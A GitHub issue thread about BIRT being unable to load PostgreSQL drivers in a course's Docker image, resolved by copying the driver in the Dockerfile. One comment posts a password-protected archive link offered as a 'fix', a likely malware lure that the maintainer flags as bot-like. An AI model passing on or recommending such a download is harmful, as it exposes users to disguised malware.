### ISSUE TITLE
BIRT: Cannot load PG drivers

### ISSUE THREAD

**Issue by mgkahn** [Andrew0Hill/NURS6293_environment#4]
Probably my lack of understanding how to install these. They need to be included in image.
The "OK" button never becomes active to select.
**********************

<img width="1535" alt="image" src="https://github.com/user-attachments/assets/0f935dfd-7246-4237-92d1-234d703c1b9d">

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Andrew0Hill** [comment]
Seems like that previous comment is from a bot or something...

I can definitely fix this one, DBeaver will automatically download Postgres drivers from Maven, so we just need to point BIRT to those drivers. 

I don't know if there is a way to configure that through CLI (so I'm not sure if we can do it in the Dockerfile) but I can configure manually and then commit the container to a new image.

**Comment by mgkahn** [comment]
@Andrew0Hill I've done the same cheap trick -- load it into a container and then save the container as an image. It breaks auto-builds so it is less desirable. But it is a cheap shortcut.......

**Comment by Andrew0Hill** [comment]
Dockerfile copies Postgres driver into image, so BIRT can see it.
